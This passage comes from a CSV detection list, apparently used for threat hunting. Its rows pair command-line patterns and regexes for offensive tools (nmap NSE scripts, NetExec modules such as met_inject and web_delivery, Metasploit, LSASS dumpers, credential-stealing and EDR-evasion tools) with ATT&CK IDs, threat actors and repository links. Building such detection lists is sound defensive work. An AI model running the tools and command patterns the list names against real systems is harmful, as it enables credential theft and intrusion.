- T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2185" "* mqtt-subscribe.nse*",".{0,1000}\smqtt\-subscribe\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2186" "* mremoteng.py*",".{0,1000}\smremoteng\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2187" "* mrinfo.nse*",".{0,1000}\smrinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2188" "* MS15-034.nse*",".{0,1000}\sMS15\-034\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","N/A","10","968","369","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z","2190" "* ms17010 -i *",".{0,1000}\sms17010\s\-i\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 
- TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","N/A","10","10","279","48","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z","2191" "* ms17010 -n *",".{0,1000}\sms17010\s\-n\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - 
Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","N/A","10","10","279","48","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z","2192" "* msfdb run *",".{0,1000}\smsfdb\srun\s\s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","2193" "* --msfoptions *",".{0,1000}\s\-\-msfoptions\s.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","2194" "* --msf-path*",".{0,1000}\s\-\-msf\-path.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","2195" "* msfremove.ps1*",".{0,1000}\smsfremove\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","2196" "* msfstaged.exe*",".{0,1000}\smsfstaged\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","2197" "* msfupdate.ps1*",".{0,1000}\smsfupdate\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","2198" "* msfvenom.bat*",".{0,1000}\smsfvenom\.bat.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","2199" "* msfws.py *",".{0,1000}\smsfws\.py\s.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","0","N/A","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","2200" "* Mshikaki.cpp*",".{0,1000}\sMshikaki\.cpp.{0,1000}","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. 
Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tool","https://github.com/trevorsaudi/Mshikaki","1","0","N/A","N/A","9","2","135","25","2023-11-26T18:13:40Z","2023-09-03T16:35:50Z","2201" "* msrpc-enum.nse*",".{0,1000}\smsrpc\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2202" "* mssprinkler.ps1*",".{0,1000}\smssprinkler\.ps1.{0,1000}","offensive_tool_keyword","MSSprinkler","password spraying utility for organizations to test their M365 accounts from an external perspective. 
It employs a 'low-and-slow' approach","T1110.003 - T1110.001","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/TheresAFewConors/MSSprinkler","1","0","N/A","N/A","9","1","74","7","2025-02-25T13:32:41Z","2024-09-15T09:54:53Z","2203" "* mssql * -u * -p * -M met_inject*",".{0,1000}\smssql\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\smet_inject.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2204" "* mssql * -u * -p * -M mssql_priv*",".{0,1000}\smssql\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\smssql_priv.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2205" "* mssql * -u * -p * -M web_delivery *",".{0,1000}\smssql\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\sweb_delivery\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2206" "* 
ms-sql-brute.nse*",".{0,1000}\sms\-sql\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2207" "* ms-sql-config.nse*",".{0,1000}\sms\-sql\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2208" "* ms-sql-dac.nse*",".{0,1000}\sms\-sql\-dac\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2209" "* ms-sql-dump-hashes.nse*",".{0,1000}\sms\-sql\-dump\-hashes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2210" "* ms-sql-empty-password.nse*",".{0,1000}\sms\-sql\-empty\-password\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2211" "* ms-sql-hasdbaccess.nse*",".{0,1000}\sms\-sql\-hasdbaccess\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2212" "* ms-sql-info.nse*",".{0,1000}\sms\-sql\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2213" "* ms-sql-ntlm-info.nse*",".{0,1000}\sms\-sql\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2214" "* ms-sql-query.nse*",".{0,1000}\sms\-sql\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2215" "* ms-sql-tables.nse*",".{0,1000}\sms\-sql\-tables\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2216" "* ms-sql-xp-cmdshell.nse*",".{0,1000}\sms\-sql\-xp\-cmdshell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2217" "* --mstsc-poison-hkcr*",".{0,1000}\s\-\-mstsc\-poison\-hkcr.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","2218" "* mtrace.nse*",".{0,1000}\smtrace\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2219" "* MultiDump.exe*",".{0,1000}\sMultiDump\.exe.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","2220" "* murmur-version.nse*",".{0,1000}\smurmur\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2221" "* MutationGate.cpp*",".{0,1000}\sMutationGate\.cpp.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","0","N/A","N/A","8","3","251","34","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z","2222" "* mysql-audit.nse*",".{0,1000}\smysql\-audit\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2223" "* mysql-brute.nse*",".{0,1000}\smysql\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2224" "* mysql-databases.nse*",".{0,1000}\smysql\-databases\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2225" "* mysql-dump-hashes.nse*",".{0,1000}\smysql\-dump\-hashes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2226" "* mysql-empty-password.nse*",".{0,1000}\smysql\-empty\-password\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2227" "* mysql-enum.nse*",".{0,1000}\smysql\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2228" "* mysql-info.nse*",".{0,1000}\smysql\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2229" "* mysql-query.nse*",".{0,1000}\smysql\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability 